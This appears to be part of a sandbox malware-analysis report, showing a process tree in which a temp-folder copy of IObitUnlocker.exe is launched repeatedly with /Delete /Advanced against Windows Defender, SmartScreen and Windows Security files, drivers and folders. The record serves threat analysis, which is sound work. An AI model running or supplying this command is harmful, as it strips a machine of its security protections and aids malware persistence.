                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10364
